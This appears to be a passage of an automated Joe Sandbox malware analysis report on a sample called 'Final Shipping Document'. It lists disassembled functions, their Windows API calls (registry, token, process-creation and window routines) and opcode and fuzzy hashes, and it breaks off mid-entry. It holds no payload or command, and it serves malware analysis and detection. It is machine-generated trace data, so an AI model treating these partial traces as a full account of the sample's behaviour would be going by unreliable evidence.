                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: be693125efd12e894d7bc87f8ca4b44ca3a65f8e51c3a5646c7d80aecadcf6ab
                                                            • Instruction ID: 02be3f281eb55d4ce54846e5576871e998d23ef11b2ef2c7634a17ac24a465c1
                                                            • Opcode Fuzzy Hash: be693125efd12e894d7bc87f8ca4b44ca3a65f8e51c3a5646c7d80aecadcf6ab
                                                            • Instruction Fuzzy Hash: 5F51D172A00216ABDB258F68DC81FAFB7E9EB44720F1546AAFC05D6241FB34DC44D664
                                                            Function 00C2BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BCCA
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2BD25
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2BD6A
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C2BD99
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2BDF3
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2BDFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 1120388591-0
                                                            • Opcode ID: 6f498bb31b8e38023f428154e1130deba00d2e75e79e637b3a4031845bc60477
                                                            • Instruction ID: c8247f49a803db49b862570ee154672b50de995124306f4018313872eb83f2e6
                                                            • Opcode Fuzzy Hash: 6f498bb31b8e38023f428154e1130deba00d2e75e79e637b3a4031845bc60477
                                                            • Instruction Fuzzy Hash: D081B030218241EFC714DF24D891E6ABBE5FF85308F14899CF5594B2A2DB31EE45CB92
                                                            Function 00BFF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000035), ref: 00BFF7B9
                                                            • SysAllocString.OLEAUT32(00000001), ref: 00BFF860
                                                            • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF889
                                                            • VariantClear.OLEAUT32(00BFFA64), ref: 00BFF8AD
                                                            • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF8B1
                                                            • VariantClear.OLEAUT32(?), ref: 00BFF8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            • Opcode ID: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                            • Instruction ID: 6659c791250a91002e8579863b32eb7d8e9d51f60ae42231870b07fa912ca7ca
                                                            • Opcode Fuzzy Hash: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                            • Instruction Fuzzy Hash: 6E51D43551031AFACF20AB65D8D5B39B3E4EF45310B2494E6EA05DF292DBB0CC44D796
                                                            Function 00C1910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C194E5
                                                            • _wcslen.LIBCMT ref: 00C19506
                                                            • _wcslen.LIBCMT ref: 00C1952D
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C19585
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName$OpenSave
                                                            • String ID: X
                                                            • API String ID: 83654149-3081909835
                                                            • Opcode ID: 6595c19d11edf85ba3cd33bebbf0d1bf857bdf9eacb172d29a9bffb91c422b8c
                                                            • Instruction ID: 041d51319bd8a594112c156c2dfa2bcf61ed9879cc68e0387f9945c7a7de9703
                                                            • Opcode Fuzzy Hash: 6595c19d11edf85ba3cd33bebbf0d1bf857bdf9eacb172d29a9bffb91c422b8c
                                                            • Instruction Fuzzy Hash: B7E192715083108FD724DF24C891AAEB7E5FF86314F0485ADF8999B2A2DB31DE45CB92
                                                            Function 00BB920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • BeginPaint.USER32(?,?,?), ref: 00BB9241
                                                            • GetWindowRect.USER32(?,?), ref: 00BB92A5
                                                            • ScreenToClient.USER32(?,?), ref: 00BB92C2
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB92D3
                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00BB9321
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BF71EA
                                                              • Part of subcall function 00BB9339: BeginPath.GDI32(00000000), ref: 00BB9357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 3050599898-0
                                                            • Opcode ID: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                            • Instruction ID: 131f70406b226c8caf4c6da042ac13987e2137b4c9b279bb18e3e1327b8553da
                                                            • Opcode Fuzzy Hash: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                            • Instruction Fuzzy Hash: 9D41AC71104200AFD721DF28DCC5FBA7BF8EF45720F1402A9FAA4972A2C7719949DB61
                                                            Function 00C107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C1080C
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C10847
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C10863
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C108DC
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C108F3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C10921
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3368777196-0
                                                            • Opcode ID: 56914022ca1effb108d3960137d672cb669bde5b5eabf0464f29ea53480c6e04
                                                            • Instruction ID: f47aeb29e9666f01802f52663055f456494e8b19b7dbe97470ce58846415d653
                                                            • Opcode Fuzzy Hash: 56914022ca1effb108d3960137d672cb669bde5b5eabf0464f29ea53480c6e04
                                                            • Instruction Fuzzy Hash: 75415971900205EBEF14AF64DC85BAE77B9FF05310F1440A9E900AA297D7B1DEA5DBA0
                                                            Function 00C381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00BFF3AB,00000000,?,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00C3824C
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00C38272
                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C382D1
                                                            • ShowWindow.USER32(00000000,00000004), ref: 00C382E5
                                                            • EnableWindow.USER32(00000000,00000001), ref: 00C3830B
                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C3832F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                            • Instruction ID: d7510663e788f0d3c88ae2393322e976ebb54aaae22ee91d713718eacd5de308
                                                            • Opcode Fuzzy Hash: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                            • Instruction Fuzzy Hash: C7419474611744AFDF11CF15CC99BE97BE0BB0A714F184169FA185B272CB32A949CB50
                                                            Function 00C04C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00C04C95
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C04CB2
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C04CEA
                                                            • _wcslen.LIBCMT ref: 00C04D08
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C04D10
                                                            • _wcsstr.LIBVCRUNTIME ref: 00C04D1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                            • String ID:
                                                            • API String ID: 72514467-0
                                                            • Opcode ID: c134f81820deaea4549fb9ca85cf1307f3dfc3805e7d7d9bbf13e28fc4542dcb
                                                            • Instruction ID: a0631bfa4f559ae8fc48910af0254884d389c2f2401620b56c36be2908333c1d
                                                            • Opcode Fuzzy Hash: c134f81820deaea4549fb9ca85cf1307f3dfc3805e7d7d9bbf13e28fc4542dcb
                                                            • Instruction Fuzzy Hash: 2B21D4B2204201BBEB195B39EC4AF7F7BECDF45750F108069FA05DA191EAA1DD00D7A0
                                                            Function 00C1581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                            • _wcslen.LIBCMT ref: 00C1587B
                                                            • CoInitialize.OLE32(00000000), ref: 00C15995
                                                            • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C159AE
                                                            • CoUninitialize.OLE32 ref: 00C159CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 3172280962-24824748
                                                            • Opcode ID: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                            • Instruction ID: d2197e7853357974e569828a895655b87ebe712260747402a2ea5909762bc18c
                                                            • Opcode Fuzzy Hash: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                            • Instruction Fuzzy Hash: 35D16570608701DFC714DF14C490A6ABBE1EF8A710F14889DF8999B361DB31ED86DB92
                                                            Function 00C0175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                              • Part of subcall function 00C00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                              • Part of subcall function 00C00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                              • Part of subcall function 00C00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                              • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                            • GetLengthSid.ADVAPI32(?,00000000,00C01335), ref: 00C017AE
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C017BA
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C017C1
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C017DA
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C01335), ref: 00C017EE
                                                            • HeapFree.KERNEL32(00000000), ref: 00C017F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                            • Instruction ID: a93a557f57de4dd6b0839eb7d7f8c66d7195852ab78f95919a01efac88b3f010
                                                            • Opcode Fuzzy Hash: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                            • Instruction Fuzzy Hash: 7B119032510205FFDB149FA8CC89BAFBBF9EF45355F184018F891A7290D735AA44DB60
                                                            Function 00C014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C014FF
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00C01506
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C01515
                                                            • CloseHandle.KERNEL32(00000004), ref: 00C01520
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C0154F
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C01563
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                            • Instruction ID: 8bad31ddd1d92d91bb44650f1a39495cc2b77257e06c788cdf4280c19d8aa7c2
                                                            • Opcode Fuzzy Hash: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                            • Instruction Fuzzy Hash: 8C113A7250024DABDF118F98DD89FDE7BA9EF49744F088015FE15A20A0C375CE64DB60
                                                            Function 00BC3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BC3379,00BC2FE5), ref: 00BC3390
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC339E
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC33B7
                                                            • SetLastError.KERNEL32(00000000,?,00BC3379,00BC2FE5), ref: 00BC3409
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                            • Instruction ID: f37139f7362fff9c12dd1f342d77b845bd5848988b9e7ff862595998069232e0
                                                            • Opcode Fuzzy Hash: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                            • Instruction Fuzzy Hash: 7B01243220C351BEAA2427B57CD5F6E2AD4EB45B793A082BEF410812F0EF554E015288
                                                            Function 00BD2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                            • _free.LIBCMT ref: 00BD2DAB
                                                            • _free.LIBCMT ref: 00BD2DD3
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DE0
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                            • _abort.LIBCMT ref: 00BD2DF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: d3fbe5aa5b55a0cce2cd82c00b68f2ac8d012efe355eb3061ee9b1943bc49684
                                                            • Instruction ID: 086772910e2ee64241cd9c17c2ec5280853442622d2269d95963f4c1869b6862
                                                            • Opcode Fuzzy Hash: d3fbe5aa5b55a0cce2cd82c00b68f2ac8d012efe355eb3061ee9b1943bc49684
                                                            • Instruction Fuzzy Hash: 4CF0CD3550468067C22227357C46F5FA5D7EFE27A1F2445B7F864923E2FF6488015271
                                                            Function 00C38A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                              • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C38A4E
                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00C38A62
                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C38A70
                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00C38A80
                                                            • EndPath.GDI32(?), ref: 00C38A90
                                                            • StrokePath.GDI32(?), ref: 00C38AA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                            • Instruction ID: 953d6ab4f93fa86e8809979c1f9f316ee5eec4618055c58f9910fda41a64e137
                                                            • Opcode Fuzzy Hash: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                            • Instruction Fuzzy Hash: AF11C97601014DFFDB129F94DC88FAE7F6DEB08354F048052BA19AA1A1C7719E55DFA0
                                                            Function 00C051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
